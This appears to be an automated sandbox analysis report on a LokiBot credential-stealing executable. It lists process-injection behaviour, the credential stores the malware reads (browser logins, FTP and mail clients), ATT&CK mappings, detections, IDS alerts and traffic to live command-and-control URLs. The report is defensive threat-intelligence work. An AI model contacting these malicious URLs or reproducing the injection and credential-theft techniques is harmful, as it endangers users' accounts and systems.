                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123958645.0000000003AE4000.00000004.00000800.00020000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123958645.0000000003962000.00000004.00000800.00020000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123958645.000000000388D000.00000004.00000800.00020000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123958645.000000000390C000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123958645.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
                      Source: aspnet_compiler.exe, 00000002.00000002.2182495250.0000000000E48000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Process information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Process queried: DebugPort
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h] 2_2_0040317B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Code function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: 0.2.6SQADa3zKv.exe.2823d98.2.raw.unpack, BATMAN.cs - Reference to suspicious API methods: WriteProcessMemory_API(processInformation.HasanHandle, num9 + 8, bytes, 4, ref bytesWritten)
                      Source: 0.2.6SQADa3zKv.exe.2823d98.2.raw.unpack, BATMAN.cs - Reference to suspicious API methods: ReadProcessMemory_API(processInformation.HasanHandle, num9 + 8, ref buffer, 4, ref bytesWritten)
                      Source: 0.2.6SQADa3zKv.exe.2823d98.2.raw.unpack, BATMAN.cs - Reference to suspicious API methods: VirtualAllocEx_API(processInformation.HasanHandle, 0, length, 12288, 64)
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: B50008
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Queries volume information: C:\Users\user\Desktop\6SQADa3zKv.exe VolumeInformation
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match - File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: Process Memory Space: 6SQADa3zKv.exe PID: 5948, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: aspnet_compiler.exe PID: 5748, type: MEMORYSTR
                      Source: Yara match - File source: dump.pcap, type: PCAP
                      Source: Yara match - File source: 6SQADa3zKv.exe, type: SAMPLE
                      Source: Yara match - File source: 0.0.6SQADa3zKv.exe.410000.0.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 00000000.00000000.2119213083.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match - File source: 6SQADa3zKv.exe, type: SAMPLE
                      Source: Yara match - File source: 0.0.6SQADa3zKv.exe.410000.0.unpack, type: UNPACKEDPE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Code function: PopPassword 2_2_0040D069
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Code function: SmtpPassword 2_2_0040D069
                      Source: Yara match - File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

Source: Yara match | File source: 6SQADa3zKv.exe, type: SAMPLE
Source: Yara match | File source: 0.0.6SQADa3zKv.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2119213083.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 6SQADa3zKv.exe, type: SAMPLE
Source: Yara match | File source: 0.0.6SQADa3zKv.exe.410000.0.unpack, type: UNPACKEDPE
MITRE ATT&CK Matrix (numbers in parentheses are the per-technique counts shown in the report)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (1) | DLL Side-Loading (1) | Access Token Manipulation (1) | Masquerading (1) | OS Credential Dumping (2) | Security Software Discovery (21) | Remote Services | Email Collection (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection (311) | Disable or Modify Tools (1) | Credentials in Registry (2) | Process Discovery (1) | Remote Desktop Protocol | Archive Collected Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (41) | Security Account Manager | Virtualization/Sandbox Evasion (41) | SMB/Windows Admin Shares | Data from Local System (2) | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Access Token Manipulation (1) | NTDS | File and Directory Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (113) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Process Injection (311) | LSA Secrets | System Information Discovery (13) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Deobfuscate/Decode Files or Information (1) | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Obfuscated Files or Information (3) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Software Packing (12) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | DLL Side-Loading (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

Source | Detection | Scanner | Label
6SQADa3zKv.exe | 61% | ReversingLabs | Win32.Trojan.Leonem
6SQADa3zKv.exe | 100% | Avira | TR/AD.LokiBot.zrgmo
6SQADa3zKv.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://dddotx.shop/Mine/PWS/fre.php | 100% | Avira URL Cloud | malware
http://kbfvzoboss.bid/alien/fre.php | 100% | Avira URL Cloud | phishing
http://alphastand.top/alien/fre.php | 100% | Avira URL Cloud | malware
https://dddotx.shop/Mine/PWS/fre.phpH | 100% | Avira URL Cloud | malware
http://alphastand.win/alien/fre.php | 100% | Avira URL Cloud | malware
http://www.ibsensoftware.com/ | 0% | Avira URL Cloud | safe
http://dddotx.shop/Mine/PWS/fre.php | 100% | Avira URL Cloud | malware
http://alphastand.trade/alien/fre.php | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dddotx.shop | 172.67.153.63 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://dddotx.shop/Mine/PWS/fre.php | true | Avira URL Cloud: malware | unknown
http://kbfvzoboss.bid/alien/fre.php | true | Avira URL Cloud: phishing | unknown
http://alphastand.win/alien/fre.php | true | Avira URL Cloud: malware | unknown
http://alphastand.trade/alien/fre.php | true | Avira URL Cloud: malware | unknown
http://alphastand.top/alien/fre.php | true | Avira URL Cloud: malware | unknown
http://dddotx.shop/Mine/PWS/fre.php | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/ | aspnet_compiler.exe, 00000002.00000002.2182679778.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.2182495250.0000000000E48000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dddotx.shop/Mine/PWS/fre.phpH | aspnet_compiler.exe, 00000002.00000002.2182495250.0000000000E48000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.ibsensoftware.com/ | aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.153.63 | dddotx.shop | United States | 13335 | CLOUDFLARENETUS | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1569270
                          Start date and time:2024-12-05 17:07:55 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 2m 31s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:4
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:6SQADa3zKv.exe
                          renamed because original name is a hash value
                          Original Sample Name:7cfbe6d3f41c153c78f4e24211ffd891cde46411f072d83798e0e03e140a7021.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@5/3@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 52
                          • Number of non-executed functions: 5
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: 6SQADa3zKv.exe
Time | Type | Description
11:08:51 | API Interceptor | 1x Sleep call for process: aspnet_compiler.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.153.63 | https://news.aiccampaign.com/p?h=HwOLjtfiW2yHAKsD1stCKxBj7FkaC&activityId=10248378&target=https%3A%2F%2Fmofficelive.com%2FMmichael.chan@exp.com&data=05%7C01%7Cmichael.chan@exp.com%7C54305d23abf84af50b4408db8c62611f%7C4ac47f737479484a903a7c08b6270689%7C0%7C0%7C638258126396723132%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C3000%7C%7C%7C&sdata=hUx9CR5JSHAZGXMoEe4Hq7ufTz2AUdh6s2eZsz7kfJo=&reserved=0 | malicious | HTMLPhisher
 | https://news.aiccampaign.com/p?h=HwOLjtfiW2yHAKsD1stCKxBj7FkaC&activityId=10248378&target=https%3A%2F%2Fmofficelive.com%2FMmichael.chan@exp.com | malicious | HTMLPhisher
Match | Associated Sample Name / URL | Detection | Threat Name | Context
dddotx.shop | Quotation.exe | malicious | Lokibot, PureLog Stealer | 104.21.12.202
 | rPedidodecompra__PO20441__ARIMComponentes.exe | malicious | Lokibot, PureLog Stealer, zgRAT | 188.114.96.3
 | 1e#U0414.exe | malicious | Lokibot | 188.114.96.3
 | (PO403810)_VOLEX_doc.exe | malicious | Lokibot | 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Uit9z2gICf.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.177.134
 | OHScaqAPjt.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 172.67.74.152
 | 3D7sM44MQp.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.177.134
 | 8JuGuaUaZP.exe | malicious | AgentTesla | 104.26.13.205
 | lUy4SKlE6A.exe | malicious | AgentTesla | 104.26.12.205
 | http://kitces.emlnk1.com | malicious | Unknown | 104.20.0.15
 | https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/ | malicious | Unknown | 172.64.150.63
 | DX7V71Ro7b.exe | malicious | GuLoader, Snake Keylogger | 172.67.177.134
 | xFHqehx1tb.exe | malicious | AgentTesla, DarkTortilla | 104.26.12.205
 | https://sendgb.com/Aw8gObHpGVR?utm_medium=dZJEAfc2MGnvjBD | malicious | HTMLPhisher | 104.21.80.92
                              No context
                              No context
                              Process:C:\Users\user\Desktop\6SQADa3zKv.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):226
                              Entropy (8bit):5.360398796477698
                              Encrypted:false
                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                              MD5:3A8957C6382192B71471BD14359D0B12
                              SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                              SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                              SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                              Malicious:true
                              Reputation:high, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:1
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):49
                              Entropy (8bit):1.2701062923235522
                              Encrypted:false
                              SSDEEP:3:/l1PL3n:fPL3
                              MD5:CD8FA61AD2906643348EEF98A988B873
                              SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
                              SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
                              SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:........................................user.
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.360385292157706
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              • Win32 Executable (generic) a (10002005/4) 49.78%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              File name:6SQADa3zKv.exe
                              File size:187'904 bytes
                              MD5:d1d899b06642500d72acaeb42896b348
                              SHA1:69683cca8c559a7cc2b6484ea982b2ca44be7a2f
                              SHA256:7cfbe6d3f41c153c78f4e24211ffd891cde46411f072d83798e0e03e140a7021
                              SHA512:69a69e0546a0972135b34561f530765046649296be879f83606d613a00c5a1b5f48b4bb91df1f91854dba3d80e4ce5c82fe03670ea0c1c4cbef0856c030312e5
                              SSDEEP:3072:Dj2RbI+4N6qZjddV5stDIoMNLGcJEma5cPGWUIi3gCmPc/NNsOsajV5f8ve:D+mZ5z2DeJEmaW1C9+cTsXwV5G
                              TLSH:8E04C0E9F2E78E22C27C5A3246D212005371EF862473EB2B359933249A377D31519BDB
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..g..............0.................. ........@.. .......................@............`................................
                              Icon Hash:010d4c4948182c0e
                              Entrypoint:0x42e4de
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x6715F620 [Mon Oct 21 06:35:12 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Instruction
                              jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e490 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x30000 | 0x12b4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x32000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2e450 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2c4e4 | 0x2c600 | 50d212df5c6d5ca4bb005a885cf28373 | False | 0.7605578785211268 | data | 7.412026734524428 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x30000 | 0x12b4 | 0x1400 | 80d2e4440c8361b066f46e866df46c2e | False | 0.3119140625 | data | 4.199137704739214 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x32000 | 0xc | 0x200 | 4ea1f3d92fa8010ac33cbb8877e24e9b | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x30130 | 0xc28 | Device independent bitmap graphic, 23 x 64 x 32, image size 2944, resolution 11811 x 11811 px/m | | | 0.2577120822622108
RT_GROUP_ICON | 0x30d58 | 0x14 | data | | | 1.1
RT_VERSION | 0x30d6c | 0x35c | data | | | 0.4418604651162791
RT_MANIFEST | 0x310c8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-05T17:08:48.612484+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.6 | 49707 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:48.612484+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.6 | 49707 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:48.612484+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.6 | 49707 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:49.559564+0100 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.6 | 49707 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:49.951076+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.6 | 49708 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:49.951076+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.6 | 49708 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:49.951076+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.6 | 49708 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:50.948383+0100 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.6 | 49708 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:51.642512+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.6 | 49710 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:51.642512+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.6 | 49710 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:51.642512+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.6 | 49710 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:52.636477+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.6 | 49710 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:52.636477+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.6 | 49710 | 172.67.153.63 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 17:08:48.338478088 CET | 49707 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:48.458786011 CET | 80 | 49707 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:48.458956957 CET | 49707 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:48.492671967 CET | 49707 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:48.612423897 CET | 80 | 49707 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:48.612483978 CET | 49707 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:48.737193108 CET | 80 | 49707 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:49.559437037 CET | 80 | 49707 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:49.559463978 CET | 80 | 49707 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:49.559474945 CET | 80 | 49707 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:49.559485912 CET | 80 | 49707 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:49.559499025 CET | 80 | 49707 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:49.559564114 CET | 49707 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:49.559621096 CET | 49707 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:49.559701920 CET | 49707 | 80 | 192.168.2.6 | 172.67.153.63
